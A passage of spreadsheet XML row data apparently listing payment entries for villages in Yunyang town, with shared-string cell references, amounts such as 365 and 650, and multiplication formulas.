        <v>3840</v>
      </c>
      <c r="B1423" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1423" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1423" s="17" t="s">
        <v>3841</v>
      </c>
      <c r="E1423" s="17" t="s">
        <v>3758</v>
      </c>
      <c r="F1423" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1423" s="17">
        <v>1</v>
      </c>
      <c r="H1423" s="18">
        <v>365</v>
      </c>
      <c r="I1423" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1423" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1423" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1424" customHeight="1" spans="1:11">
      <c r="A1424" s="16" t="s">
        <v>3842</v>
      </c>
      <c r="B1424" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1424" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1424" s="17" t="s">
        <v>3843</v>
      </c>
      <c r="E1424" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1424" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1424" s="17">
        <v>1</v>
      </c>
      <c r="H1424" s="18">
        <v>365</v>
      </c>
      <c r="I1424" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1424" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1424" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1425" customHeight="1" spans="1:11">
      <c r="A1425" s="16" t="s">
        <v>3844</v>
      </c>
      <c r="B1425" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1425" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1425" s="17" t="s">
        <v>3845</v>
      </c>
      <c r="E1425" s="17" t="s">
        <v>3846</v>
      </c>
      <c r="F1425" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1425" s="17">
        <v>1</v>
      </c>
      <c r="H1425" s="18">
        <v>365</v>
      </c>
      <c r="I1425" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1425" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1425" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1426" customHeight="1" spans="1:11">
      <c r="A1426" s="16" t="s">
        <v>3847</v>
      </c>
      <c r="B1426" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1426" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1426" s="17" t="s">
        <v>3848</v>
      </c>
      <c r="E1426" s="17" t="s">
        <v>3849</v>
      </c>
      <c r="F1426" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1426" s="17">
        <v>1</v>
      </c>
      <c r="H1426" s="18">
        <v>365</v>
      </c>
      <c r="I1426" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1426" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1426" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1427" customHeight="1" spans="1:11">
      <c r="A1427" s="16" t="s">
        <v>3850</v>
      </c>
      <c r="B1427" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1427" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1427" s="17" t="s">
        <v>3851</v>
      </c>
      <c r="E1427" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1427" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1427" s="17">
        <v>1</v>
      </c>
      <c r="H1427" s="18">
        <v>365</v>
      </c>
      <c r="I1427" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1427" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1427" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1428" customHeight="1" spans="1:11">
      <c r="A1428" s="16" t="s">
        <v>3853</v>
      </c>
      <c r="B1428" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1428" s="17" t="s">
        <v>3635</v>
      </c>
      <c r="D1428" s="17" t="s">
        <v>3854</v>
      </c>
      <c r="E1428" s="17" t="s">
        <v>2500</v>
      </c>
      <c r="F1428" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1428" s="17">
        <v>2</v>
      </c>
      <c r="H1428" s="18">
        <v>355</v>
      </c>
      <c r="I1428" s="17">
        <f t="shared" si="72"/>
        <v>710</v>
      </c>
      <c r="J1428" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1428" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1429" customHeight="1" spans="1:11">
      <c r="A1429" s="16" t="s">
        <v>3855</v>
      </c>
      <c r="B1429" s="17" t="str">
        <f>B1428</f>
        <v>云阳镇</v>
      </c>
      <c r="C1429" s="17" t="str">
        <f>C1428</f>
        <v>大关十组</v>
      </c>
      <c r="D1429" s="46" t="s">
        <v>3856</v>
      </c>
      <c r="E1429" s="47" t="s">
        <v>874</v>
      </c>
      <c r="F1429" s="17" t="str">
        <f>F1428</f>
        <v>4113210522</v>
      </c>
      <c r="G1429" s="17"/>
      <c r="H1429" s="17"/>
      <c r="I1429" s="17"/>
      <c r="J1429" s="17"/>
      <c r="K1429" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1430" customHeight="1" spans="1:11">
      <c r="A1430" s="16" t="s">
        <v>3857</v>
      </c>
      <c r="B1430" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1430" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1430" s="17" t="s">
        <v>3858</v>
      </c>
      <c r="E1430" s="17" t="s">
        <v>3859</v>
      </c>
      <c r="F1430" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1430" s="17">
        <v>1</v>
      </c>
      <c r="H1430" s="18">
        <v>365</v>
      </c>
      <c r="I1430" s="17">
        <f t="shared" ref="I1430:I1436" si="73">H1430*G1430</f>
        <v>365</v>
      </c>
      <c r="J1430" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1430" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1431" customHeight="1" spans="1:11">
      <c r="A1431" s="16" t="s">
        <v>3860</v>
      </c>
      <c r="B1431" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1431" s="17" t="s">
        <v>3586</v>
      </c>
      <c r="D1431" s="17" t="s">
        <v>3861</v>
      </c>
      <c r="E1431" s="17" t="s">
        <v>2976</v>
      </c>
      <c r="F1431" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1431" s="17">
        <v>1</v>
      </c>
      <c r="H1431" s="18">
        <v>365</v>
      </c>
      <c r="I1431" s="17">
        <f t="shared" si="73"/>
        <v>365</v>
      </c>
      <c r="J1431" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1431" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1432" customHeight="1" spans="1:11">
      <c r="A1432" s="16" t="s">
        <v>3862</v>
      </c>
      <c r="B1432" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1432" s="17" t="s">
        <v>3863</v>
      </c>
      <c r="D1432" s="17" t="s">
        <v>3864</v>
      </c>
      <c r="E1432" s="17" t="s">
        <v>3865</v>
      </c>
      <c r="F1432" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1432" s="17">
        <v>1</v>
      </c>
      <c r="H1432" s="18">
        <v>365</v>
      </c>
      <c r="I1432" s="17">
        <f t="shared" si="73"/>
        <v>365</v>
      </c>
      <c r="J1432" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1432" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1433" customHeight="1" spans="1:11">
      <c r="A1433" s="16" t="s">
        <v>3866</v>
      </c>
      <c r="B1433" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1433" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1433" s="17" t="s">
        <v>3867</v>
      </c>
      <c r="E1433" s="17" t="s">
        <v>3868</v>
      </c>
      <c r="F1433" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1433" s="17">
        <v>1</v>
      </c>
      <c r="H1433" s="18">
        <v>365</v>
      </c>
      <c r="I1433" s="17">
        <f t="shared" si="73"/>
        <v>365</v>
      </c>
      <c r="J1433" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1433" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1434" customHeight="1" spans="1:11">
      <c r="A1434" s="16" t="s">
        <v>3869</v>
      </c>
      <c r="B1434" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1434" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1434" s="17" t="s">
        <v>3870</v>
      </c>
      <c r="E1434" s="17" t="s">
        <v>3747</v>
      </c>
      <c r="F1434" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1434" s="17">
        <v>1</v>
      </c>
      <c r="H1434" s="18">
        <v>365</v>
      </c>
      <c r="I1434" s="17">
        <f t="shared" si="73"/>
        <v>365</v>
      </c>
      <c r="J1434" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1434" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1435" customHeight="1" spans="1:11">
      <c r="A1435" s="16" t="s">
        <v>3871</v>
      </c>
      <c r="B1435" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1435" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1435" s="17" t="s">
        <v>3872</v>
      </c>
      <c r="E1435" s="17" t="s">
        <v>3724</v>
      </c>
      <c r="F1435" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1435" s="17">
        <v>1</v>
      </c>
      <c r="H1435" s="18">
        <v>365</v>
      </c>
      <c r="I1435" s="17">
        <f t="shared" si="73"/>
        <v>365</v>
      </c>
      <c r="J1435" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1435" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1436" customHeight="1" spans="1:11">
      <c r="A1436" s="16" t="s">
        <v>3873</v>
      </c>
      <c r="B1436" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1436" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1436" s="17" t="s">
        <v>3874</v>
      </c>
      <c r="E1436" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1436" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1436" s="17">
        <v>2</v>
      </c>
      <c r="H1436" s="18">
        <v>325</v>
      </c>
      <c r="I1436" s="17">
        <f t="shared" si="73"/>
        <v>650</v>
      </c>
      <c r="J1436" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1436" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1437" customHeight="1" spans="1:11">
      <c r="A1437" s="16" t="s">
        <v>3875</v>
      </c>
      <c r="B1437" s="17" t="str">
        <f>B1436</f>
        <v>云阳镇</v>
      </c>
      <c r="C1437" s="17" t="str">
        <f>C1436</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1437" s="16" t="s">
        <v>3876</v>
      </c>
      <c r="E1437" s="16" t="s">
        <v>3727</v>
      </c>
      <c r="F1437" s="17" t="str">
        <f>F1436</f>
        <v>4113210519</v>
      </c>
      <c r="G1437" s="17"/>
      <c r="H1437" s="17"/>
      <c r="I1437" s="17"/>
      <c r="J1437" s="17"/>
      <c r="K1437" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1438" customHeight="1" spans="1:11">
      <c r="A1438" s="16" t="s">
        <v>3877</v>
      </c>
      <c r="B1438" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1438" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1438" s="17" t="s">
        <v>3878</v>
      </c>
      <c r="E1438" s="17" t="s">
        <v>3879</v>
      </c>
      <c r="F1438" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1438" s="17">
        <v>1</v>
      </c>
      <c r="H1438" s="18">
        <v>365</v>
      </c>
      <c r="I1438" s="17">
        <f>H1438*G1438</f>
        <v>365</v>
      </c>
      <c r="J1438" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1438" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1439" customHeight="1" spans="1:11">
      <c r="A1439" s="16" t="s">
        <v>3880</v>
      </c>
      <c r="B1439" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1439" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1439" s="17" t="s">
        <v>3881</v>
      </c>
      <c r="E1439" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1439" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1439" s="17">
        <v>2</v>
      </c>
      <c r="H1439" s="18">
        <v>325</v>
      </c>
      <c r="I1439" s="17">
        <f>H1439*G1439</f>
        <v>650</v>
      </c>
      <c r="J1439" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1439" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1440" customHeight="1" spans="1:11">
      <c r="A1440" s="16" t="s">
        <v>3882</v>
      </c>
      <c r="B1440" s="17" t="str">
        <f>B1439</f>
        <v>云阳镇</v>
      </c>
      <c r="C1440" s="17" t="str">
        <f>C1439</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1440" s="16" t="s">
        <v>3883</v>
      </c>
      <c r="E1440" s="16" t="s">
        <v>3614</v>
      </c>
      <c r="F1440" s="17" t="str">
        <f>F1439</f>
        <v>4113210519</v>
      </c>
      <c r="G1440" s="17"/>
      <c r="H1440" s="17"/>
      <c r="I1440" s="17"/>
      <c r="J1440" s="17"/>
      <c r="K1440" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1441" customHeight="1" spans="1:11">
      <c r="A1441" s="16" t="s">
        <v>3884</v>
      </c>
      <c r="B1441" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1441" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1441" s="17" t="s">
        <v>3885</v>
      </c>
      <c r="E1441" s="17" t="s">
        <v>3886</v>
      </c>
      <c r="F1441" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1441" s="17">
        <v>1</v>
      </c>
      <c r="H1441" s="18">
        <v>365</v>
      </c>
      <c r="I1441" s="17">
        <f t="shared" ref="I1441:I1446" si="74">H1441*G1441</f>
        <v>365</v>
      </c>
      <c r="J1441" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1441" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1442" customHeight="1" spans="1:11">
      <c r="A1442" s="16" t="s">
        <v>3887</v>
      </c>
      <c r="B1442" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1442" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1442" s="17" t="s">
        <v>3888</v>
      </c>
      <c r="E1442" s="17" t="s">
        <v>3889</v>
      </c>
      <c r="F1442" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1442" s="17">
        <v>1</v>
      </c>
      <c r="H1442" s="18">
        <v>365</v>
      </c>
      <c r="I1442" s="17">
        <f t="shared" si="74"/>
        <v>365</v>
      </c>
      <c r="J1442" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1442" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1443" customHeight="1" spans="1:11">
      <c r="A1443" s="16" t="s">
        <v>3890</v>
      </c>
      <c r="B1443" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1443" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1443" s="17" t="s">
        <v>3891</v>
      </c>
      <c r="E1443" s="17" t="s">
        <v>3727</v>
      </c>
      <c r="F1443" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1443" s="17">
        <v>1</v>
      </c>
      <c r="H1443" s="18">
        <v>365</v>
      </c>
      <c r="I1443" s="17">
        <f t="shared" si="74"/>
        <v>365</v>
      </c>
      <c r="J1443" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1443" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1444" customHeight="1" spans="1:11">
      <c r="A1444" s="16" t="s">
        <v>3892</v>
      </c>
      <c r="B1444" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1444" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1444" s="17" t="s">
        <v>3893</v>
      </c>
      <c r="E1444" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1444" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1444" s="17">
        <v>1</v>
      </c>
      <c r="H1444" s="18">
        <v>365</v>
      </c>
      <c r="I1444" s="17">
        <f t="shared" si="74"/>
        <v>365</v>
      </c>
      <c r="J1444" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1444" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1445" customHeight="1" spans="1:11">
      <c r="A1445" s="16" t="s">
        <v>3894</v>
      </c>
      <c r="B1445" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1445" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1445" s="17" t="s">
        <v>3895</v>
      </c>
      <c r="E1445" s="17" t="s">
        <v>2558</v>
      </c>
      <c r="F1445" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1445" s="17">
        <v>1</v>
      </c>
      <c r="H1445" s="18">
        <v>365</v>
      </c>
      <c r="I1445" s="17">
        <f t="shared" si="74"/>
        <v>365</v>
      </c>
      <c r="J1445" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1445" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1446" customHeight="1" spans="1:11">
      <c r="A1446" s="16" t="s">
        <v>3896</v>
      </c>
      <c r="B1446" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1446" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1446" s="17" t="s">
        <v>665</v>
      </c>
      <c r="E1446" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1446" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1446" s="17">
        <v>2</v>
      </c>
      <c r="H1446" s="18">
        <v>325</v>
      </c>
      <c r="I1446" s="17">
        <f t="shared" si="74"/>
        <v>650</v>
      </c>
      <c r="J1446" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1446" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1447" customHeight="1" spans="1:11">
      <c r="A1447" s="16" t="s">
        <v>3897</v>
      </c>
      <c r="B1447" s="17" t="str">
        <f>B1446</f>
        <v>云阳镇</v>
      </c>
      <c r="C1447" s="17" t="str">
        <f>C1446</f>
        <v>小关二组</v>
      </c>
      <c r="D1447" s="27" t="s">
        <v>3898</v>
      </c>
      <c r="E1447" s="27" t="s">
        <v>3899</v>
      </c>
      <c r="F1447" s="17" t="str">
        <f>F1446</f>
        <v>4113210521</v>
      </c>
      <c r="G1447" s="17"/>
      <c r="H1447" s="17"/>
      <c r="I1447" s="17"/>
      <c r="J1447" s="17"/>
      <c r="K1447" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1448" customHeight="1" spans="1:11">
      <c r="A1448" s="16" t="s">
        <v>3900</v>
      </c>
      <c r="B1448" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1448" s="17" t="s">
        <v>3612</v>
      </c>
      <c r="D1448" s="17" t="s">
        <v>3901</v>
      </c>
      <c r="E1448" s="17" t="s">
        <v>3643</v>
      </c>
      <c r="F1448" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1448" s="17">
        <v>1</v>
      </c>
      <c r="H1448" s="18">
        <v>365</v>
      </c>
      <c r="I1448" s="17">
        <f>H1448*G1448</f>
        <v>365</v>
      </c>
      <c r="J1448" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1448" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1449" customHeight="1" spans="1:11">
      <c r="A1449" s="16" t="s">
        <v>3902</v>
      </c>
      <c r="B1449" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1449" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1449" s="17" t="s">
        <v>3903</v>
      </c>
      <c r="E1449" s="17" t="s">
        <v>3904</v>
      </c>
      <c r="F1449" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1449" s="17">
        <v>1</v>
      </c>
      <c r="H1449" s="18">
        <v>365</v>
      </c>
      <c r="I1449" s="17">
        <f>H1449*G1449</f>
        <v>365</v>
      </c>
      <c r="J1449" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1449" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1450" customHeight="1" spans="1:11">
      <c r="A1450" s="16" t="s">
        <v>3905</v>
      </c>
      <c r="B1450" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1450" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1450" s="17" t="s">
        <v>3906</v>
      </c>
      <c r="E1450" s="17" t="s">
        <v>3907</v>
      </c>
      <c r="F1450" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1450" s="17">
        <v>1</v>
      </c>
      <c r="H1450" s="18">
        <v>365</v>
      </c>
      <c r="I1450" s="17">
        <f>H1450*G1450</f>
        <v>365</v>
      </c>
      <c r="J1450" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1450" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1451" customHeight="1" spans="1:11">
      <c r="A1451" s="16" t="s">
        <v>3908</v>
      </c>
      <c r="B1451" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1451" s="17" t="s">
        <v>3695</v>
      </c>
      <c r="D1451" s="17" t="s">
        <v>3909</v>
      </c>
      <c r="E1451" s="17" t="s">
        <v>3621</v>
      </c>
      <c r="F1451" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1451" s="17">
        <v>2</v>
      </c>
      <c r="H1451" s="18">
        <v>325</v>
      </c>
      <c r="I1451" s="17">
        <f>H1451*G1451</f>
        <v>650</v>
      </c>
      <c r="J1451" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1451" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1452" customHeight="1" spans="1:11">
      <c r="A1452" s="16" t="s">
        <v>3910</v>
      </c>
      <c r="B1452" s="17" t="str">
        <f>B1451</f>
        <v>云阳镇</v>
      </c>
      <c r="C1452" s="17" t="str">
        <f>C1451</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1452" s="16" t="s">
        <v>3911</v>
      </c>
      <c r="E1452" s="16" t="s">
        <v>3912</v>
      </c>
      <c r="F1452" s="17" t="str">
        <f>F1451</f>
        <v>4113210599</v>
      </c>
      <c r="G1452" s="17"/>
      <c r="H1452" s="17"/>
      <c r="I1452" s="17"/>
      <c r="J1452" s="17"/>
      <c r="K1452" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1453" customHeight="1" spans="1:11">
      <c r="A1453" s="16" t="s">
        <v>3913</v>
      </c>
      <c r="B1453" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1453" s="17" t="s">
        <v>3695</v>
      </c>
      <c r="D1453" s="17" t="s">
        <v>3914</v>
      </c>
      <c r="E1453" s="17" t="s">
        <v>3915</v>
      </c>
      <c r="F1453" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1453" s="17">
        <v>1</v>
      </c>
      <c r="H1453" s="18">
        <v>365</v>
      </c>
      <c r="I1453" s="17">
        <f>H1453*G1453</f>
        <v>365</v>
      </c>
      <c r="J1453" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1453" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1454" customHeight="1" spans="1:11">
      <c r="A1454" s="16" t="s">
        <v>3916</v>
      </c>
      <c r="B1454" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1454" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1454" s="17" t="s">
        <v>3917</v>
      </c>
      <c r="E1454" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1454" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1454" s="17">
        <v>1</v>
      </c>
      <c r="H1454" s="18">
        <v>365</v>
      </c>
      <c r="I1454" s="17">
        <f>H1454*G1454</f>
        <v>365</v>
      </c>
      <c r="J1454" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1454" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1455" customHeight="1" spans="1:11">
      <c r="A1455" s="16" t="s">
        <v>3918</v>
      </c>
      <c r="B1455" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1455" s="17" t="s">
        <v>3741</v>
      </c>
      <c r="D1455" s="17" t="s">
        <v>3919</v>
      </c>
      <c r="E1455" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1455" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1455" s="17">
        <v>2</v>
      </c>
      <c r="H1455" s="18">
        <v>325</v>
      </c>
      <c r="I1455" s="17">
        <f>H1455*G1455</f>
        <v>650</v>
      </c>
      <c r="J1455" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1455" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1456" customHeight="1" spans="1:11">
      <c r="A1456" s="16" t="s">
        <v>3920</v>
      </c>
      <c r="B1456" s="17" t="str">
        <f>B1455</f>
        <v>云阳镇</v>
      </c>
      <c r="C1456" s="17" t="str">
        <f>C1455</f>
        <v>老城二组</v>
      </c>
      <c r="D1456" s="16" t="s">
        <v>3921</v>
      </c>
      <c r="E1456" s="16" t="s">
        <v>3682</v>
      </c>
      <c r="F1456" s="17" t="str">
        <f>F1455</f>
        <v>4113210523</v>
      </c>
      <c r="G1456" s="17"/>
      <c r="H1456" s="17"/>
      <c r="I1456" s="17"/>
      <c r="J1456" s="17"/>
      <c r="K1456" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1457" customHeight="1" spans="1:11">
      <c r="A1457" s="16" t="s">
        <v>3922</v>
      </c>
      <c r="B1457" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1457" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1457" s="17" t="s">
        <v>3923</v>
      </c>
      <c r="E1457" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1457" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1457" s="17">
        <v>1</v>
      </c>
      <c r="H1457" s="18">
        <v>365</v>
      </c>
      <c r="I1457" s="17">
        <f t="shared" ref="I1457:I1469" si="75">H1457*G1457</f>
        <v>365</v>
      </c>
      <c r="J1457" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1457" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1458" customHeight="1" spans="1:11">
      <c r="A1458" s="16" t="s">
        <v>3924</v>
      </c>
      <c r="B1458" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1458" s="17" t="s">
        <v>3925</v>
      </c>
      <c r="D1458" s="17" t="s">
        <v>3926</v>
      </c>
      <c r="E1458" s="17" t="s">
        <v>3833</v>
      </c>
      <c r="F1458" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1458" s="17">
        <v>1</v>
      </c>
      <c r="H1458" s="18">
        <v>365</v>
      </c>
      <c r="I1458" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1458" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1458" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1459" customHeight="1" spans="1:11">
      <c r="A1459" s="16" t="s">
        <v>3927</v>
      </c>
      <c r="B1459" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1459" s="17" t="s">
        <v>3794</v>
      </c>
      <c r="D1459" s="17" t="s">
        <v>3928</v>
      </c>
      <c r="E1459" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1459" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1459" s="17">
        <v>1</v>
      </c>
      <c r="H1459" s="18">
        <v>365</v>
      </c>
      <c r="I1459" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1459" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1459" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1460" customHeight="1" spans="1:11">
      <c r="A1460" s="16" t="s">
        <v>3929</v>
      </c>
      <c r="B1460" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1460" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1460" s="17" t="s">
        <v>3930</v>
      </c>
      <c r="E1460" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1460" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1460" s="17">
        <v>1</v>
      </c>
      <c r="H1460" s="18">
        <v>365</v>
      </c>
      <c r="I1460" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1460" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1460" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1461" customHeight="1" spans="1:11">
      <c r="A1461" s="16" t="s">
        <v>3931</v>
      </c>
      <c r="B1461" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1461" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1461" s="17" t="s">
        <v>3932</v>
      </c>
      <c r="E1461" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1461" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1461" s="17">
        <v>1</v>
      </c>
      <c r="H1461" s="18">
        <v>365</v>
      </c>
      <c r="I1461" s="17">
        <f t="shared" si="75"/>
        <v>365</v>
      </c>
      <c r="J1461" s="17" t="s">
        <v>224</v>
      </c>
